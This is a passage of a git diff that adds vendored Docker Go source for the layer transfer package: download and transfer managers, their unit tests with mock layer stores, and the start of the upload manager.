+ select { + case <-d.Transfer.Context().Done(): + d.err = errors.New("layer registration cancelled") + return + case <-sourceDownload.Done(): + } + + l, err = sourceDownload.result() + if err != nil { + d.err = err + return + } + + layerReader, err := l.TarStream() + if err != nil { + d.err = err + return + } + defer layerReader.Close() + + var src distribution.Descriptor + if fs, ok := l.(distribution.Describable); ok { + src = fs.Descriptor() + } + if ds, ok := d.layerStore.(layer.DescribableStore); ok { + d.layer, err = ds.RegisterWithDescriptor(layerReader, parentLayer, src) + } else { + d.layer, err = d.layerStore.Register(layerReader, parentLayer) + } + if err != nil { + d.err = fmt.Errorf("failed to register layer: %v", err) + return + } + + withRegistered, hasRegistered := descriptor.(DownloadDescriptorWithRegistered) + if hasRegistered { + withRegistered.Registered(d.layer.DiffID()) + } + + // Doesn't actually need to be its own goroutine, but + // done like this so we can defer close(c). 
+ go func() { + <-d.Transfer.Released() + if d.layer != nil { + layer.ReleaseAndLog(d.layerStore, d.layer) + } + }() + }() + + return d + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/download_test.go b/vendor/github.com/docker/docker/distribution/xfer/download_test.go new file mode 100644 index 0000000000..bc20e1e7ec --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/download_test.go @@ -0,0 +1,356 @@ +package xfer + +import ( + "bytes" + "errors" + "fmt" + "io" + "io/ioutil" + "runtime" + "sync/atomic" + "testing" + "time" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxDownloadConcurrency = 3 + +type mockLayer struct { + layerData bytes.Buffer + diffID layer.DiffID + chainID layer.ChainID + parent layer.Layer +} + +func (ml *mockLayer) TarStream() (io.ReadCloser, error) { + return ioutil.NopCloser(bytes.NewBuffer(ml.layerData.Bytes())), nil +} + +func (ml *mockLayer) TarStreamFrom(layer.ChainID) (io.ReadCloser, error) { + return nil, fmt.Errorf("not implemented") +} + +func (ml *mockLayer) ChainID() layer.ChainID { + return ml.chainID +} + +func (ml *mockLayer) DiffID() layer.DiffID { + return ml.diffID +} + +func (ml *mockLayer) Parent() layer.Layer { + return ml.parent +} + +func (ml *mockLayer) Size() (size int64, err error) { + return 0, nil +} + +func (ml *mockLayer) DiffSize() (size int64, err error) { + return 0, nil +} + +func (ml *mockLayer) Metadata() (map[string]string, error) { + return make(map[string]string), nil +} + +type mockLayerStore struct { + layers map[layer.ChainID]*mockLayer +} + +func createChainIDFromParent(parent layer.ChainID, dgsts ...layer.DiffID) layer.ChainID { + if len(dgsts) == 0 { + return parent + } + if parent == "" { + return createChainIDFromParent(layer.ChainID(dgsts[0]), dgsts[1:]...) 
+ } + // H = "H(n-1) SHA256(n)" + dgst := digest.FromBytes([]byte(string(parent) + " " + string(dgsts[0]))) + return createChainIDFromParent(layer.ChainID(dgst), dgsts[1:]...) +} + +func (ls *mockLayerStore) Map() map[layer.ChainID]layer.Layer { + layers := map[layer.ChainID]layer.Layer{} + + for k, v := range ls.layers { + layers[k] = v + } + + return layers +} + +func (ls *mockLayerStore) Register(reader io.Reader, parentID layer.ChainID) (layer.Layer, error) { + return ls.RegisterWithDescriptor(reader, parentID, distribution.Descriptor{}) +} + +func (ls *mockLayerStore) RegisterWithDescriptor(reader io.Reader, parentID layer.ChainID, _ distribution.Descriptor) (layer.Layer, error) { + var ( + parent layer.Layer + err error + ) + + if parentID != "" { + parent, err = ls.Get(parentID) + if err != nil { + return nil, err + } + } + + l := &mockLayer{parent: parent} + _, err = l.layerData.ReadFrom(reader) + if err != nil { + return nil, err + } + l.diffID = layer.DiffID(digest.FromBytes(l.layerData.Bytes())) + l.chainID = createChainIDFromParent(parentID, l.diffID) + + ls.layers[l.chainID] = l + return l, nil +} + +func (ls *mockLayerStore) Get(chainID layer.ChainID) (layer.Layer, error) { + l, ok := ls.layers[chainID] + if !ok { + return nil, layer.ErrLayerDoesNotExist + } + return l, nil +} + +func (ls *mockLayerStore) Release(l layer.Layer) ([]layer.Metadata, error) { + return []layer.Metadata{}, nil +} +func (ls *mockLayerStore) CreateRWLayer(string, layer.ChainID, string, layer.MountInit, map[string]string) (layer.RWLayer, error) { + return nil, errors.New("not implemented") +} + +func (ls *mockLayerStore) GetRWLayer(string) (layer.RWLayer, error) { + return nil, errors.New("not implemented") +} + +func (ls *mockLayerStore) ReleaseRWLayer(layer.RWLayer) ([]layer.Metadata, error) { + return nil, errors.New("not implemented") +} +func (ls *mockLayerStore) GetMountID(string) (string, error) { + return "", errors.New("not implemented") +} + +func (ls 
*mockLayerStore) Cleanup() error { + return nil +} + +func (ls *mockLayerStore) DriverStatus() [][2]string { + return [][2]string{} +} + +func (ls *mockLayerStore) DriverName() string { + return "mock" +} + +type mockDownloadDescriptor struct { + currentDownloads *int32 + id string + diffID layer.DiffID + registeredDiffID layer.DiffID + expectedDiffID layer.DiffID + simulateRetries int +} + +// Key returns the key used to deduplicate downloads. +func (d *mockDownloadDescriptor) Key() string { + return d.id +} + +// ID returns the ID for display purposes. +func (d *mockDownloadDescriptor) ID() string { + return d.id +} + +// DiffID should return the DiffID for this layer, or an error +// if it is unknown (for example, if it has not been downloaded +// before). +func (d *mockDownloadDescriptor) DiffID() (layer.DiffID, error) { + if d.diffID != "" { + return d.diffID, nil + } + return "", errors.New("no diffID available") +} + +func (d *mockDownloadDescriptor) Registered(diffID layer.DiffID) { + d.registeredDiffID = diffID +} + +func (d *mockDownloadDescriptor) mockTarStream() io.ReadCloser { + // The mock implementation returns the ID repeated 5 times as a tar + // stream instead of actual tar data. The data is ignored except for + // computing IDs. + return ioutil.NopCloser(bytes.NewBuffer([]byte(d.id + d.id + d.id + d.id + d.id))) +} + +// Download is called to perform the download. +func (d *mockDownloadDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) { + if d.currentDownloads != nil { + defer atomic.AddInt32(d.currentDownloads, -1) + + if atomic.AddInt32(d.currentDownloads, 1) > maxDownloadConcurrency { + return nil, 0, errors.New("concurrency limit exceeded") + } + } + + // Sleep a bit to simulate a time-consuming download. 
+ for i := int64(0); i <= 10; i++ { + select { + case <-ctx.Done(): + return nil, 0, ctx.Err() + case <-time.After(10 * time.Millisecond): + progressOutput.WriteProgress(progress.Progress{ID: d.ID(), Action: "Downloading", Current: i, Total: 10}) + } + } + + if d.simulateRetries != 0 { + d.simulateRetries-- + return nil, 0, errors.New("simulating retry") + } + + return d.mockTarStream(), 0, nil +} + +func (d *mockDownloadDescriptor) Close() { +} + +func downloadDescriptors(currentDownloads *int32) []DownloadDescriptor { + return []DownloadDescriptor{ + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id1", + expectedDiffID: layer.DiffID("sha256:68e2c75dc5c78ea9240689c60d7599766c213ae210434c53af18470ae8c53ec1"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id2", + expectedDiffID: layer.DiffID("sha256:64a636223116aa837973a5d9c2bdd17d9b204e4f95ac423e20e65dfbb3655473"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id3", + expectedDiffID: layer.DiffID("sha256:58745a8bbd669c25213e9de578c4da5c8ee1c836b3581432c2b50e38a6753300"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id2", + expectedDiffID: layer.DiffID("sha256:64a636223116aa837973a5d9c2bdd17d9b204e4f95ac423e20e65dfbb3655473"), + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id4", + expectedDiffID: layer.DiffID("sha256:0dfb5b9577716cc173e95af7c10289322c29a6453a1718addc00c0c5b1330936"), + simulateRetries: 1, + }, + &mockDownloadDescriptor{ + currentDownloads: currentDownloads, + id: "id5", + expectedDiffID: layer.DiffID("sha256:0a5f25fa1acbc647f6112a6276735d0fa01e4ee2aa7ec33015e337350e1ea23d"), + }, + } +} + +func TestSuccessfulDownload(t *testing.T) { + // TODO Windows: Fix this unit text + if runtime.GOOS == "windows" { + t.Skip("Needs fixing on Windows") + } + layerStore := &mockLayerStore{make(map[layer.ChainID]*mockLayer)} + ldm := NewLayerDownloadManager(layerStore, 
maxDownloadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]progress.Progress) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p + } + close(progressDone) + }() + + var currentDownloads int32 + descriptors := downloadDescriptors(¤tDownloads) + + firstDescriptor := descriptors[0].(*mockDownloadDescriptor) + + // Pre-register the first layer to simulate an already-existing layer + l, err := layerStore.Register(firstDescriptor.mockTarStream(), "") + if err != nil { + t.Fatal(err) + } + firstDescriptor.diffID = l.DiffID() + + rootFS, releaseFunc, err := ldm.Download(context.Background(), *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + if err != nil { + t.Fatalf("download error: %v", err) + } + + releaseFunc() + + close(progressChan) + <-progressDone + + if len(rootFS.DiffIDs) != len(descriptors) { + t.Fatal("got wrong number of diffIDs in rootfs") + } + + for i, d := range descriptors { + descriptor := d.(*mockDownloadDescriptor) + + if descriptor.diffID != "" { + if receivedProgress[d.ID()].Action != "Already exists" { + t.Fatalf("did not get 'Already exists' message for %v", d.ID()) + } + } else if receivedProgress[d.ID()].Action != "Pull complete" { + t.Fatalf("did not get 'Pull complete' message for %v", d.ID()) + } + + if rootFS.DiffIDs[i] != descriptor.expectedDiffID { + t.Fatalf("rootFS item %d has the wrong diffID (expected: %v got: %v)", i, descriptor.expectedDiffID, rootFS.DiffIDs[i]) + } + + if descriptor.diffID == "" && descriptor.registeredDiffID != rootFS.DiffIDs[i] { + t.Fatal("diffID mismatch between rootFS and Registered callback") + } + } +} + +func TestCancelledDownload(t *testing.T) { + ldm := NewLayerDownloadManager(&mockLayerStore{make(map[layer.ChainID]*mockLayer)}, maxDownloadConcurrency) + + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + + go func() { + for range 
progressChan { + } + close(progressDone) + }() + + ctx, cancel := context.WithCancel(context.Background()) + + go func() { + <-time.After(time.Millisecond) + cancel() + }() + + descriptors := downloadDescriptors(nil) + _, _, err := ldm.Download(ctx, *image.NewRootFS(), descriptors, progress.ChanOutput(progressChan)) + if err != context.Canceled { + t.Fatal("expected download to be cancelled") + } + + close(progressChan) + <-progressDone +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer.go b/vendor/github.com/docker/docker/distribution/xfer/transfer.go new file mode 100644 index 0000000000..14f15660ac --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer.go @@ -0,0 +1,401 @@ +package xfer + +import ( + "runtime" + "sync" + + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +// DoNotRetry is an error wrapper indicating that the error cannot be resolved +// with a retry. +type DoNotRetry struct { + Err error +} + +// Error returns the stringified representation of the encapsulated error. +func (e DoNotRetry) Error() string { + return e.Err.Error() +} + +// Watcher is returned by Watch and can be passed to Release to stop watching. +type Watcher struct { + // signalChan is used to signal to the watcher goroutine that + // new progress information is available, or that the transfer + // has finished. + signalChan chan struct{} + // releaseChan signals to the watcher goroutine that the watcher + // should be detached. + releaseChan chan struct{} + // running remains open as long as the watcher is watching the + // transfer. It gets closed if the transfer finishes or the + // watcher is detached. + running chan struct{} +} + +// Transfer represents an in-progress transfer. 
+type Transfer interface { + Watch(progressOutput progress.Output) *Watcher + Release(*Watcher) + Context() context.Context + Close() + Done() <-chan struct{} + Released() <-chan struct{} + Broadcast(masterProgressChan <-chan progress.Progress) +} + +type transfer struct { + mu sync.Mutex + + ctx context.Context + cancel context.CancelFunc + + // watchers keeps track of the goroutines monitoring progress output, + // indexed by the channels that release them. + watchers map[chan struct{}]*Watcher + + // lastProgress is the most recently received progress event. + lastProgress progress.Progress + // hasLastProgress is true when lastProgress has been set. + hasLastProgress bool + + // running remains open as long as the transfer is in progress. + running chan struct{} + // released stays open until all watchers release the transfer and + // the transfer is no longer tracked by the transfer manager. + released chan struct{} + + // broadcastDone is true if the master progress channel has closed. + broadcastDone bool + // closed is true if Close has been called + closed bool + // broadcastSyncChan allows watchers to "ping" the broadcasting + // goroutine to wait for it for deplete its input channel. This ensures + // a detaching watcher won't miss an event that was sent before it + // started detaching. + broadcastSyncChan chan struct{} +} + +// NewTransfer creates a new transfer. +func NewTransfer() Transfer { + t := &transfer{ + watchers: make(map[chan struct{}]*Watcher), + running: make(chan struct{}), + released: make(chan struct{}), + broadcastSyncChan: make(chan struct{}), + } + + // This uses context.Background instead of a caller-supplied context + // so that a transfer won't be cancelled automatically if the client + // which requested it is ^C'd (there could be other viewers). + t.ctx, t.cancel = context.WithCancel(context.Background()) + + return t +} + +// Broadcast copies the progress and error output to all viewers. 
+func (t *transfer) Broadcast(masterProgressChan <-chan progress.Progress) { + for { + var ( + p progress.Progress + ok bool + ) + select { + case p, ok = <-masterProgressChan: + default: + // We've depleted the channel, so now we can handle + // reads on broadcastSyncChan to let detaching watchers + // know we're caught up. + select { + case <-t.broadcastSyncChan: + continue + case p, ok = <-masterProgressChan: + } + } + + t.mu.Lock() + if ok { + t.lastProgress = p + t.hasLastProgress = true + for _, w := range t.watchers { + select { + case w.signalChan <- struct{}{}: + default: + } + } + } else { + t.broadcastDone = true + } + t.mu.Unlock() + if !ok { + close(t.running) + return + } + } +} + +// Watch adds a watcher to the transfer. The supplied channel gets progress +// updates and is closed when the transfer finishes. +func (t *transfer) Watch(progressOutput progress.Output) *Watcher { + t.mu.Lock() + defer t.mu.Unlock() + + w := &Watcher{ + releaseChan: make(chan struct{}), + signalChan: make(chan struct{}), + running: make(chan struct{}), + } + + t.watchers[w.releaseChan] = w + + if t.broadcastDone { + close(w.running) + return w + } + + go func() { + defer func() { + close(w.running) + }() + var ( + done bool + lastWritten progress.Progress + hasLastWritten bool + ) + for { + t.mu.Lock() + hasLastProgress := t.hasLastProgress + lastProgress := t.lastProgress + t.mu.Unlock() + + // Make sure we don't write the last progress item + // twice. + if hasLastProgress && (!done || !hasLastWritten || lastProgress != lastWritten) { + progressOutput.WriteProgress(lastProgress) + lastWritten = lastProgress + hasLastWritten = true + } + + if done { + return + } + + select { + case <-w.signalChan: + case <-w.releaseChan: + done = true + // Since the watcher is going to detach, make + // sure the broadcaster is caught up so we + // don't miss anything. 
+ select { + case t.broadcastSyncChan <- struct{}{}: + case <-t.running: + } + case <-t.running: + done = true + } + } + }() + + return w +} + +// Release is the inverse of Watch; indicating that the watcher no longer wants +// to be notified about the progress of the transfer. All calls to Watch must +// be paired with later calls to Release so that the lifecycle of the transfer +// is properly managed. +func (t *transfer) Release(watcher *Watcher) { + t.mu.Lock() + delete(t.watchers, watcher.releaseChan) + + if len(t.watchers) == 0 { + if t.closed { + // released may have been closed already if all + // watchers were released, then another one was added + // while waiting for a previous watcher goroutine to + // finish. + select { + case <-t.released: + default: + close(t.released) + } + } else { + t.cancel() + } + } + t.mu.Unlock() + + close(watcher.releaseChan) + // Block until the watcher goroutine completes + <-watcher.running +} + +// Done returns a channel which is closed if the transfer completes or is +// cancelled. Note that having 0 watchers causes a transfer to be cancelled. +func (t *transfer) Done() <-chan struct{} { + // Note that this doesn't return t.ctx.Done() because that channel will + // be closed the moment Cancel is called, and we need to return a + // channel that blocks until a cancellation is actually acknowledged by + // the transfer function. + return t.running +} + +// Released returns a channel which is closed once all watchers release the +// transfer AND the transfer is no longer tracked by the transfer manager. +func (t *transfer) Released() <-chan struct{} { + return t.released +} + +// Context returns the context associated with the transfer. +func (t *transfer) Context() context.Context { + return t.ctx +} + +// Close is called by the transfer manager when the transfer is no longer +// being tracked. 
+func (t *transfer) Close() { + t.mu.Lock() + t.closed = true + if len(t.watchers) == 0 { + close(t.released) + } + t.mu.Unlock() +} + +// DoFunc is a function called by the transfer manager to actually perform +// a transfer. It should be non-blocking. It should wait until the start channel +// is closed before transferring any data. If the function closes inactive, that +// signals to the transfer manager that the job is no longer actively moving +// data - for example, it may be waiting for a dependent transfer to finish. +// This prevents it from taking up a slot. +type DoFunc func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer + +// TransferManager is used by LayerDownloadManager and LayerUploadManager to +// schedule and deduplicate transfers. It is up to the TransferManager +// implementation to make the scheduling and concurrency decisions. +type TransferManager interface { + // Transfer checks if a transfer with the given key is in progress. If + // so, it returns progress and error output from that transfer. + // Otherwise, it will call xferFunc to initiate the transfer. + Transfer(key string, xferFunc DoFunc, progressOutput progress.Output) (Transfer, *Watcher) + // SetConcurrency set the concurrencyLimit so that it is adjustable daemon reload + SetConcurrency(concurrency int) +} + +type transferManager struct { + mu sync.Mutex + + concurrencyLimit int + activeTransfers int + transfers map[string]Transfer + waitingTransfers []chan struct{} +} + +// NewTransferManager returns a new TransferManager. 
+func NewTransferManager(concurrencyLimit int) TransferManager { + return &transferManager{ + concurrencyLimit: concurrencyLimit, + transfers: make(map[string]Transfer), + } +} + +// SetConcurrency set the concurrencyLimit +func (tm *transferManager) SetConcurrency(concurrency int) { + tm.mu.Lock() + tm.concurrencyLimit = concurrency + tm.mu.Unlock() +} + +// Transfer checks if a transfer matching the given key is in progress. If not, +// it starts one by calling xferFunc. The caller supplies a channel which +// receives progress output from the transfer. +func (tm *transferManager) Transfer(key string, xferFunc DoFunc, progressOutput progress.Output) (Transfer, *Watcher) { + tm.mu.Lock() + defer tm.mu.Unlock() + + for { + xfer, present := tm.transfers[key] + if !present { + break + } + // Transfer is already in progress. + watcher := xfer.Watch(progressOutput) + + select { + case <-xfer.Context().Done(): + // We don't want to watch a transfer that has been cancelled. + // Wait for it to be removed from the map and try again. + xfer.Release(watcher) + tm.mu.Unlock() + // The goroutine that removes this transfer from the + // map is also waiting for xfer.Done(), so yield to it. + // This could be avoided by adding a Closed method + // to Transfer to allow explicitly waiting for it to be + // removed the map, but forcing a scheduling round in + // this very rare case seems better than bloating the + // interface definition. 
+ runtime.Gosched() + <-xfer.Done() + tm.mu.Lock() + default: + return xfer, watcher + } + } + + start := make(chan struct{}) + inactive := make(chan struct{}) + + if tm.concurrencyLimit == 0 || tm.activeTransfers < tm.concurrencyLimit { + close(start) + tm.activeTransfers++ + } else { + tm.waitingTransfers = append(tm.waitingTransfers, start) + } + + masterProgressChan := make(chan progress.Progress) + xfer := xferFunc(masterProgressChan, start, inactive) + watcher := xfer.Watch(progressOutput) + go xfer.Broadcast(masterProgressChan) + tm.transfers[key] = xfer + + // When the transfer is finished, remove from the map. + go func() { + for { + select { + case <-inactive: + tm.mu.Lock() + tm.inactivate(start) + tm.mu.Unlock() + inactive = nil + case <-xfer.Done(): + tm.mu.Lock() + if inactive != nil { + tm.inactivate(start) + } + delete(tm.transfers, key) + tm.mu.Unlock() + xfer.Close() + return + } + } + }() + + return xfer, watcher +} + +func (tm *transferManager) inactivate(start chan struct{}) { + // If the transfer was started, remove it from the activeTransfers + // count. 
+ select { + case <-start: + // Start next transfer if any are waiting + if len(tm.waitingTransfers) != 0 { + close(tm.waitingTransfers[0]) + tm.waitingTransfers = tm.waitingTransfers[1:] + } else { + tm.activeTransfers-- + } + default: + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go new file mode 100644 index 0000000000..6c50ce3524 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/transfer_test.go @@ -0,0 +1,410 @@ +package xfer + +import ( + "sync/atomic" + "testing" + "time" + + "github.com/docker/docker/pkg/progress" +) + +func TestTransfer(t *testing.T) { + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + select { + case <-start: + default: + t.Fatalf("transfer function not started even though concurrency limit not reached") + } + + xfer := NewTransfer() + go func() { + for i := 0; i <= 10; i++ { + progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10} + time.Sleep(10 * time.Millisecond) + } + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(5) + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + val, present := receivedProgress[p.ID] + if present && p.Current <= val { + t.Fatalf("got unexpected progress value: %d (expected %d)", p.Current, val+1) + } + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + // Start a few transfers + ids := []string{"id1", "id2", "id3"} + xfers := make([]Transfer, len(ids)) + watchers := make([]*Watcher, len(ids)) + for i, id := range ids { + xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan)) + } + + for i, xfer := range xfers { + <-xfer.Done() + 
xfer.Release(watchers[i]) + } + close(progressChan) + <-progressDone + + for _, id := range ids { + if receivedProgress[id] != 10 { + t.Fatalf("final progress value %d instead of 10", receivedProgress[id]) + } + } +} + +func TestConcurrencyLimit(t *testing.T) { + concurrencyLimit := 3 + var runningJobs int32 + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + <-start + totalJobs := atomic.AddInt32(&runningJobs, 1) + if int(totalJobs) > concurrencyLimit { + t.Fatalf("too many jobs running") + } + for i := 0; i <= 10; i++ { + progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10} + time.Sleep(10 * time.Millisecond) + } + atomic.AddInt32(&runningJobs, -1) + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(concurrencyLimit) + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + // Start more transfers than the concurrency limit + ids := []string{"id1", "id2", "id3", "id4", "id5", "id6", "id7", "id8"} + xfers := make([]Transfer, len(ids)) + watchers := make([]*Watcher, len(ids)) + for i, id := range ids { + xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan)) + } + + for i, xfer := range xfers { + <-xfer.Done() + xfer.Release(watchers[i]) + } + close(progressChan) + <-progressDone + + for _, id := range ids { + if receivedProgress[id] != 10 { + t.Fatalf("final progress value %d instead of 10", receivedProgress[id]) + } + } +} + +func TestInactiveJobs(t *testing.T) { + concurrencyLimit := 3 + var runningJobs int32 + testDone := make(chan struct{}) + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- 
progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + <-start + totalJobs := atomic.AddInt32(&runningJobs, 1) + if int(totalJobs) > concurrencyLimit { + t.Fatalf("too many jobs running") + } + for i := 0; i <= 10; i++ { + progressChan <- progress.Progress{ID: id, Action: "testing", Current: int64(i), Total: 10} + time.Sleep(10 * time.Millisecond) + } + atomic.AddInt32(&runningJobs, -1) + close(inactive) + <-testDone + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(concurrencyLimit) + progressChan := make(chan progress.Progress) + progressDone := make(chan struct{}) + receivedProgress := make(map[string]int64) + + go func() { + for p := range progressChan { + receivedProgress[p.ID] = p.Current + } + close(progressDone) + }() + + // Start more transfers than the concurrency limit + ids := []string{"id1", "id2", "id3", "id4", "id5", "id6", "id7", "id8"} + xfers := make([]Transfer, len(ids)) + watchers := make([]*Watcher, len(ids)) + for i, id := range ids { + xfers[i], watchers[i] = tm.Transfer(id, makeXferFunc(id), progress.ChanOutput(progressChan)) + } + + close(testDone) + for i, xfer := range xfers { + <-xfer.Done() + xfer.Release(watchers[i]) + } + close(progressChan) + <-progressDone + + for _, id := range ids { + if receivedProgress[id] != 10 { + t.Fatalf("final progress value %d instead of 10", receivedProgress[id]) + } + } +} + +func TestWatchRelease(t *testing.T) { + ready := make(chan struct{}) + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + defer func() { + close(progressChan) + }() + <-ready + for i := int64(0); ; i++ { + select { + case <-time.After(10 * time.Millisecond): + case <-xfer.Context().Done(): + return + } + progressChan <- progress.Progress{ID: id, Action: "testing", Current: i, Total: 10} + } + }() + 
return xfer + } + } + + tm := NewTransferManager(5) + + type watcherInfo struct { + watcher *Watcher + progressChan chan progress.Progress + progressDone chan struct{} + receivedFirstProgress chan struct{} + } + + progressConsumer := func(w watcherInfo) { + first := true + for range w.progressChan { + if first { + close(w.receivedFirstProgress) + } + first = false + } + close(w.progressDone) + } + + // Start a transfer + watchers := make([]watcherInfo, 5) + var xfer Transfer + watchers[0].progressChan = make(chan progress.Progress) + watchers[0].progressDone = make(chan struct{}) + watchers[0].receivedFirstProgress = make(chan struct{}) + xfer, watchers[0].watcher = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(watchers[0].progressChan)) + go progressConsumer(watchers[0]) + + // Give it multiple watchers + for i := 1; i != len(watchers); i++ { + watchers[i].progressChan = make(chan progress.Progress) + watchers[i].progressDone = make(chan struct{}) + watchers[i].receivedFirstProgress = make(chan struct{}) + watchers[i].watcher = xfer.Watch(progress.ChanOutput(watchers[i].progressChan)) + go progressConsumer(watchers[i]) + } + + // Now that the watchers are set up, allow the transfer goroutine to + // proceed. + close(ready) + + // Confirm that each watcher gets progress output. + for _, w := range watchers { + <-w.receivedFirstProgress + } + + // Release one watcher every 5ms + for _, w := range watchers { + xfer.Release(w.watcher) + <-time.After(5 * time.Millisecond) + } + + // Now that all watchers have been released, Released() should + // return a closed channel. + <-xfer.Released() + + // Done() should return a closed channel because the xfer func returned + // due to cancellation. 
+ <-xfer.Done() + + for _, w := range watchers { + close(w.progressChan) + <-w.progressDone + } +} + +func TestWatchFinishedTransfer(t *testing.T) { + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + xfer := NewTransfer() + go func() { + // Finish immediately + close(progressChan) + }() + return xfer + } + } + + tm := NewTransferManager(5) + + // Start a transfer + watchers := make([]*Watcher, 3) + var xfer Transfer + xfer, watchers[0] = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(make(chan progress.Progress))) + + // Give it a watcher immediately + watchers[1] = xfer.Watch(progress.ChanOutput(make(chan progress.Progress))) + + // Wait for the transfer to complete + <-xfer.Done() + + // Set up another watcher + watchers[2] = xfer.Watch(progress.ChanOutput(make(chan progress.Progress))) + + // Release the watchers + for _, w := range watchers { + xfer.Release(w) + } + + // Now that all watchers have been released, Released() should + // return a closed channel. 
+ <-xfer.Released() +} + +func TestDuplicateTransfer(t *testing.T) { + ready := make(chan struct{}) + + var xferFuncCalls int32 + + makeXferFunc := func(id string) DoFunc { + return func(progressChan chan<- progress.Progress, start <-chan struct{}, inactive chan<- struct{}) Transfer { + atomic.AddInt32(&xferFuncCalls, 1) + xfer := NewTransfer() + go func() { + defer func() { + close(progressChan) + }() + <-ready + for i := int64(0); ; i++ { + select { + case <-time.After(10 * time.Millisecond): + case <-xfer.Context().Done(): + return + } + progressChan <- progress.Progress{ID: id, Action: "testing", Current: i, Total: 10} + } + }() + return xfer + } + } + + tm := NewTransferManager(5) + + type transferInfo struct { + xfer Transfer + watcher *Watcher + progressChan chan progress.Progress + progressDone chan struct{} + receivedFirstProgress chan struct{} + } + + progressConsumer := func(t transferInfo) { + first := true + for range t.progressChan { + if first { + close(t.receivedFirstProgress) + } + first = false + } + close(t.progressDone) + } + + // Try to start multiple transfers with the same ID + transfers := make([]transferInfo, 5) + for i := range transfers { + t := &transfers[i] + t.progressChan = make(chan progress.Progress) + t.progressDone = make(chan struct{}) + t.receivedFirstProgress = make(chan struct{}) + t.xfer, t.watcher = tm.Transfer("id1", makeXferFunc("id1"), progress.ChanOutput(t.progressChan)) + go progressConsumer(*t) + } + + // Allow the transfer goroutine to proceed. + close(ready) + + // Confirm that each watcher gets progress output. + for _, t := range transfers { + <-t.receivedFirstProgress + } + + // Confirm that the transfer function was called exactly once. 
+ if xferFuncCalls != 1 { + t.Fatal("transfer function wasn't called exactly once") + } + + // Release one watcher every 5ms + for _, t := range transfers { + t.xfer.Release(t.watcher) + <-time.After(5 * time.Millisecond) + } + + for _, t := range transfers { + // Now that all watchers have been released, Released() should + // return a closed channel. + <-t.xfer.Released() + // Done() should return a closed channel because the xfer func returned + // due to cancellation. + <-t.xfer.Done() + } + + for _, t := range transfers { + close(t.progressChan) + <-t.progressDone + } +} diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload.go b/vendor/github.com/docker/docker/distribution/xfer/upload.go new file mode 100644 index 0000000000..ad3398369c --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/xfer/upload.go @@ -0,0 +1,168 @@ +package xfer + +import ( + "errors" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "golang.org/x/net/context" +) + +const maxUploadAttempts = 5 + +// LayerUploadManager provides task management and progress reporting for +// uploads. +type LayerUploadManager struct { + tm TransferManager +} + +// SetConcurrency set the max concurrent uploads for each push +func (lum *LayerUploadManager) SetConcurrency(concurrency int) { + lum.tm.SetConcurrency(concurrency) +} + +// NewLayerUploadManager returns a new LayerUploadManager. +func NewLayerUploadManager(concurrencyLimit int) *LayerUploadManager { + return &LayerUploadManager{ + tm: NewTransferManager(concurrencyLimit), + } +} + +type uploadTransfer struct { + Transfer + + remoteDescriptor distribution.Descriptor + err error +} + +// An UploadDescriptor references a layer that may need to be uploaded. +type UploadDescriptor interface { + // Key returns the key used to deduplicate uploads. + Key() string + // ID returns the ID for display purposes. 
